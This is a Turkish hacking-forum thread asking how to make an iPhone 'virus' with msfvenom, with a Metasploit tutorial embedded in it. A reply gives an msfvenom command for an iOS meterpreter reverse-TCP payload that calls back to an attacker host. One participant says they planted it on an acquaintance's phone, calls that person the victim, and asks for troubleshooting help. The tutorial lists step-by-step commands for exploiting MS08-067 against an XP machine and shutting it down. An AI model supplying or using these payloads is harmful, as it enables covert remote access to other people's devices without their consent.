- 20 Eyl 2021
- 2,539
- 692
- 24
Msfvenom ios için iphone için virüs yapabilme özelliği var mı?
Msfvenom ios için iphone için virüs yapabilme özelliği var mı?
- Konbuyu başlatan TURKHACKER2009
- Başlangıç tarihi
- 16 May 2020
- 1,640
- 1,172
Selamlar, msfvenom da böyle bir özellik mevcuttur. Verdiğim komutu yazarak ios cihazlar için bir meterpreter bağlantısı oluşturup bunu metasploit konsol ile dinleyebilirsiniz:
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f macho -o out
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f macho -o out
- 20 Eyl 2021
- 2,539
- 692
- 24
Teşekkürler
Hocam bir şey diyeceğim. Ben bunu bir telefona attım yani açtım telefon elimde şo an bir tanıdığın telefonu açtım ama veri diyor sadece o kadar indirdim ama açınca şu kadar boyutta bir veri diyor o kadar
- Sızma Testlerinde Metasploit Kullanımı
Sızma Testlerinde Metasploit Kullanımı
Metasploit, Ruby dili ile yazılmış açık kaynak kodlu bir “Penetrasyon Test” aracıdır. Metasploit Framework mevcut cihazlar üzerinde bulunan zaafiyetlerin exploit edimesi amacıyla geliştirilmiş bir framework'tür. Metasploit temel olarak aşağıdaki bileşenlerden oluşmaktadır.
- Exploit, Hedef sistemde çalışan servis yada uygulamaların zayıflıklarını kullanarak amaçlara ulaşmak için kullanılan güvenlik açıklarıdır.
- Payload, exploitin bulduğu açıkların sonrasında hedef sisteme sızmaya yarar. Bir nevi exploit açığı kullanarak saldırır, payload bu açığa yerleşerek iş yapmamızı sağlar.
- Auxiliary, sistemi taramaya yarayan araçları içerir. Sniffing, Scanning gibi işlemler yapar.
- Encoders, exploit içindeki kodların sistem tarafından tanınmasını önlemekten sorumludur.
Şekil 1:msfconsole arayüzü
Metasploit Kısayolları
Tüm linux işletim sistemlerinde olduğu gibi metasploit üzerinde TAB tuşu ile otomatik tamamlama yapılabilmektedir. Ayrıca yardım almak için help komutu kullanılabilir.
Show Komutu: Metasploit içerisindeki modüllerden bilgi alınabilir. Show komutu ilgili platforma göre yanıtlar döndermektedir. Örneğin, Linux modüllerini Windows modülleri içerisindeyken görüntülenemez.
Search Komutu: Aradığınız modülle ilgili bilgi arar.
Şekil 2: Netapi açıklarını arama
Check Komutu: Hedef sistemin mevcut exploiti içerip içermediğini kontrol etmek için kullanılır.Tüm exploit modülleri tarafından desteklenmeyebilir.
Use Komutu: Exploit işlemlerinin gerçekleştirilmesi için gereken modülleri seçmemizi sağlayan komuttur.
Run Komutu: Hedefimizde ki makineye karşı exploit veya auxiliary modülünü kullanacağımıza karar verdikten sonra sisteme saldırı başlatmak için kullanacağımız komuttur. Alternatif olarak "exploit" komutu da kullanılabilir.
Set Komutu: Kullanılacak modül içerisindeki parametrelerin tanımlanmasını sağlayan komuttur. Eğer tüm modüllerde kullanılacak parametreler tanımlanmak isteniyorsa "setg" komutu kullanılabilir.
Sessions Komutu: Birden fazla bağlantı yönetmek için kullanılır. Bağlantılarınızı arka plana atabilir ve gerekli olduğunda tekrar çağırabilirsiniz.
Şekil 3: "set” ve “show” komutları
Şekil 4:"run" komutu
Nmap ve Metasploit Kullanarak Örnek Test
Nmap aracı Kali Linux da bulunan bir ağ tarama aracıdır. Çok yaygın olarak kullanılır. Ağ hakkında genel ve ayrıntılı olarak bilgi edinilebilir. Ayrıntılı port taraması yapılır. Örneğimizde sanal makinaya kurulan XP makinayı ele geçirip cmd komutları ile XP makinası kaptıldı.
İzlenilen Adımlar:
- sudo apt-get update
- sudo apt-get install nmap (nmap aracını yüklemek için terminale yazıyoruz)
- nmap -sS -A -p 192.168.159.128 (Ip adresine-XP makinamızın IP adresi- versiyon, işletim sistemi ve port taraması yapılır.) Açık portlardan saldırı düzenlenebilir. Açık portlara ayrıca tarama yapılır.
- Sistem bilgilerigörseldedir (Şekil 5) 445 açıklığını kullanıldı.
- msfconsole (Terminale yazarak metasploit başlatılır).
- search ms08 (exploiti aratıyoruz. Ardından karşımıza exploitler çıkıyor.)
- use exploit/Windows/sbm/ms08_067_ntapi (use yazarak istediğimiz exploiti kullanmayı sağlıyoruz)
- show payloads ( diyerek payload’ları görüntülenmesini sağlıyoruz)
- set payloads windows/shell/bind_tcp(seçtiğimiz payload’ı yazıyoruz)
- show options (yazarak seçenekleri görüntülüyoruz).
- set RHOST_._._._(hedef IP) (hedefin adresini yazıyoruz).
- exploit ( son olarak yazıp exploiti yolluyoruz ).
- Artık hedef bilgisayar elimizde istediğimiz gibi işlem yapabiliriz.
- shutdown àkomutunu yazdığımız da hedef bilgisayarın kendiliğinden kapandığını görebiliriz.
Şekil 5: XP makine bilgileri
- 20 Eyl 2021
- 2,539
- 692
- 24
düşmüyor kurbanda o yüzden ne olduğunu anlamadım
Yardımcı olabilecek var mı? msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f macho -o out
bu kod ile yaptım indirdim fakat içi boş bişi açıldı ve hiç bişi olmadı dinleyemedim de
- 20 Eyl 2021
- 2,539
- 692
- 24
++++++++++
- 15 Tem 2022
- 465
- 176
Konuyu hortlatmak yasak diye biliyorum.APPLE-İOS zaten güvenliği ile tanınmaktadır.Full güvenlikli bir işletim sistemine nasıl trojan-virüs atmayı düşünüyorsun?
